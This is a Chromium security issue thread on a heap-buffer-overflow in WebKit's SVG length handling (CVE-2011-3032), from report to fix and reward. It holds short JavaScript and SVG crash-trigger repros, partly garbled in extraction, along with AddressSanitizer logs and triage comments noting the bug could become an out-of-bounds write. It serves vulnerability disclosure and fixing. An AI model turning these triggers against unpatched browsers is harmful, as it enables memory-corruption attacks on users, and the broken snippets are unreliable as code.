New issue
Advanced search Search tips

Issue 108037 link

Starred by 1 user

Issue metadata

Status: Fixed
Closed: Feb 2012
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

  • Only users with EditIssue permission may comment.

Sign in to add a comment

Heap-buffer-overflow in WebCore::SVGLength::valueAsString

Reported by, Dec 19 2011

Issue description

Heap buffer overflow can be triggered while building SVG animated element length.

18.0.974.0 (Developer Build 114913 Linux)
Crashes also on Windows 7, 16.0.912.63 m, but not under debugger.
Can't crash under Linux 16.0.912.63, it's behavior is weird - doesn't load second time. However, first crash was caught in this version.

            function go() {
                c = 0;
                q = document.getElementById('root').contentDocument;
                s = q.getElementById('s');
                a = q.getElementById('a');
                    function crash() {
                        if (c==0) = 'x';
                        if (c==1) s.appendChild( a.cloneNode(0) );
                        if (c==2) setTimeout("'b'", 1);
                    }, 1
        <object data="f.svg" id="root" onload="go()"/></object>

--- f.svg ---

<svg id="s" xmlns="" xmlns:xlink="">
<text id="x"></text>
<animate xlink:href="#x" id="a" attributeName="y" from="1" to="2" dur="1s"/>

==32190== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f19005e1400 at pc 0x7f1939a4e2d5 bp 0x7fff62d57750 sp 0x7fff62d57748
READ of size 4 at 0x7f19005e1400 thread T0
    #0 0x7f1939a4e2d5 in WebCore::SVGLength::valueAsString() const /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/svg/SVGLength.cpp:252
    #1 0x7f1939b40568 in WebCore::SVGLengthList::valueAsString() const /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/svg/SVGLengthList.cpp:66
    #2 0x7f1939b3c7a5 in WebCore::SVGAnimatedType::valueAsString() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/svg/SVGAnimatedType.cpp:312
    #3 0x7f19399d2ee5 in WebCore::SVGAnimateElement::applyResultsToTarget() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/svg/SVGAnimateElement.cpp:233
    #4 0x7f1939accadf in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, double, WTF::String const&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/svg/animation/SMILTimeContainer.cpp:297
    #5 0x7f1939acb918 in ~RefPtr /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/RefPtr.h:58
    #6 0x7f193899235a in WebCore::ThreadTimers::sharedTimerFiredInternal() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/platform/ThreadTimers.cpp:118
0x7f19005e1400 is located 0 bytes to the right of 128-byte region [0x7f19005e1380,0x7f19005e1400)
allocated by thread T0 here:
    #0 0x7f193b174414 in malloc ??:0
    #1 0x7f193838db66 in WTF::fastMalloc(unsigned long) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/FastMalloc.cpp:268
    #2 0x7f1938d3b189 in WTF::Vector<WebCore::SVGLength, 0ul>::expandCapacity(unsigned long, WebCore::SVGLength const*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/Vector.h:786
    #3 0x7f19399dec25 in WebCore::SVGAnimationElement::updateAnimation(float, unsigned int, WebCore::SVGSMILElement*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/svg/SVGAnimationElement.cpp:624
    #4 0x7f1939adc8d2 in WebCore::SVGSMILElement::progress(WebCore::SMILTime, WebCore::SVGSMILElement*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/svg/animation/SVGSMILElement.cpp:947
    #5 0x7f1939acc782 in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, double, WTF::String const&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/svg/animation/SMILTimeContainer.cpp:277
    #6 0x7f1939acb918 in ~RefPtr /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/RefPtr.h:58
    #7 0x7f193899235a in WebCore::ThreadTimers::sharedTimerFiredInternal() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/platform/ThreadTimers.cpp:118
==32190== ABORTING
Stats: 30M malloced (25M for red zones) by 61515 calls
Stats: 1M realloced by 1131 calls
Stats: 24M freed by 47396 calls
Stats: 0M really freed by 0 calls
Stats: 84M (21518 full pages) mmaped in 21 calls
  mmaps   by size class: 8:65532; 9:8191; 10:4095; 11:2047; 12:1024; 13:1024; 14:256; 15:256; 16:64; 17:64; 18:16; 19:8; 21:4; 22:1;
  mallocs by size class: 8:49099; 9:6324; 10:3288; 11:1202; 12:344; 13:911; 14:130; 15:148; 16:23; 17:36; 18:1; 19:4; 21:4; 22:1;
  frees   by size class: 8:36909; 9:5277; 10:2960; 11:846; 12:238; 13:872; 14:110; 15:139; 16:16; 17:20; 18:1; 19:4; 21:4;
  rfrees  by size class:
Stats: malloc large: 46 small slow: 312
Shadow byte and word:
  0x1fe3200bc280: fa
  0x1fe3200bc280: fa fa fa fa fa fa fa fa
More shadow bytes:
  0x1fe3200bc260: fa fa fa fa fa fa fa fa
  0x1fe3200bc268: fa fa fa fa fa fa fa fa
  0x1fe3200bc270: 00 00 00 00 00 00 00 00
  0x1fe3200bc278: 00 00 00 00 00 00 00 00
=>0x1fe3200bc280: fa fa fa fa fa fa fa fa
  0x1fe3200bc288: fa fa fa fa fa fa fa fa
  0x1fe3200bc290: fd fd fd fd fd fd fd fd
  0x1fe3200bc298: fd fd fd fd fd fd fd fd
  0x1fe3200bc2a0: fa fa fa fa fa fa fa fa


Comment 1 by, Dec 19 2011

Status: Assigned
Summary: Heap-buffer-overflow in WebCore::SVGLength::valueAsString
Detailed report:


Crash Type: Heap-buffer-overflow READ 4
Crash Address: 0x7fd4218a6900
Crash State:
  - crash stack -

Minimized Testcase (0.57 Kb):
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecSeverity-Medium OS-All Mstone-16 SecImpacts-Stable SecImpacts-Beta Stability-AddressSanitizer
From the ASAN log:
==24989== ERROR: AddressSanitizer crashed on unknown address 0x0000bbadbeef (pc 0x7fb6be616941 sp 0x7fb67a8f0740 bp 0x7fb67a8f0a90 ax 0x0000bbadbeef T15)

Isn't 0xbbadbeef a WebKit ASSERT? I wonder what it does in a release ASAN build?
Chris, the report has both release and debug build stacks (release stack after the debug stack). on debug, it crashes on the assert and on release, it crashes on heap-buffer-overflow.
Oh, well isn't that just epic :)

Comment 7 by, Dec 19 2011

Yeah. It's misinterpreting a user-supplied numeric value as a length value. So, very bad--probably high severity but I have to verify that a write or call is possible after the read. Shouldn't be a difficult fix, but I have to figure out where it goes.

Comment 8 by, Dec 20 2011

Still trying to figure out the right spot to catch this, but here's a simpler (single file) repro:

<svg id="s">
  <text id="x"></text>
  <animate xlink:href="#x" id="a" attributeName="y" from="0" to="1" dur="1s" repeatCount="indefinite">
setTimeout(function() {
    s = document.getElementById('s') = 'x'
    setTimeout(function () {'b' }, 0)
}, 0)

Comment 9 by, Dec 21 2011

Adam, please try the repro from comment #8. You may need to wait 10 seconds and reload.
Labels: -SecSeverity-Medium SecSeverity-High WEBKIT-ID-75096 reward-topanel
Reported upstream:

I'll be uploading a patch shortly, and I've upped the severity because you can turn it into an OOB write/execute.
Labels: -Mstone-16 Mstone-17
The last M16 patch is already gone. Mass-updating all of these to M17
Labels: WebKit-SVG
Could someone please add me (schenney ... to the WebKit bug so I can see it and track progress and nudge reviewers if needed.
Thanks for grabbing this. I'm heads down on the Flash sandbox right now and haven't had time to circle back to it.

To add some context, Niko's suggestion upstream about where to move the checks is a bad idea. However, the patch I submitted probably wasn't entirely right either. It catches the bad animate element before use, but you can probably do better by preventing the bad animate from getting created when the node is cloned.
Status: Started
Status: Fixed
Committed WebKit r108134: <>

Security team will need to merge this into earlier branches as I do not have committer status yet.
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
Labels: -Merge-Approved Merge-Merged
Labels: -reward-topanel reward-1000 reward-unpaid
@Ax330d: I'm sure you're not surprised about $1000 :)

Boilerplate text:
Please do NOT publicly disclose details until a fix has been released to all our
users. Early public disclosure may cancel the provisional reward.
Also, please be considerate about disclosure when the bug affects a core library
that may be used by other products.
Please do NOT share this information with third parties who are not directly
involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.
Labels: CVE-2011-3032
Labels: -reward-unpaid

Comment 25 by, May 15 2012

Status: Fixed
Marking old security bugs Fixed..
Project Member

Comment 26 by, Oct 13 2012

Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member

Comment 27 by, Mar 10 2013

Labels: -Type-Security -Area-WebKit -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta -Stability-AddressSanitizer -Mstone-17 -WebKit-SVG Cr-Content Cr-Content-SVG Security-Impact-Stable Security-Impact-Beta Security-Severity-High Type-Bug-Security M-17 Performance-Memory-AddressSanitizer
Project Member

Comment 28 by, Mar 13 2013

Labels: Restrict-View-EditIssue
Project Member

Comment 29 by, Mar 13 2013

Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member

Comment 31 by, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High
Project Member

Comment 32 by, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member

Comment 33 by, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member

Comment 34 by, Apr 1 2013

Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member

Comment 35 by, Apr 6 2013

Labels: -Cr-Content Cr-Blink
Project Member

Comment 36 by, Apr 6 2013

Labels: -Cr-Content-SVG Cr-Blink-SVG
Project Member

Comment 37 by, Jun 14 2016

Labels: -security_impact-beta
Project Member

Comment 38 by, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot
Project Member

Comment 39 by, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted

Sign in to add a comment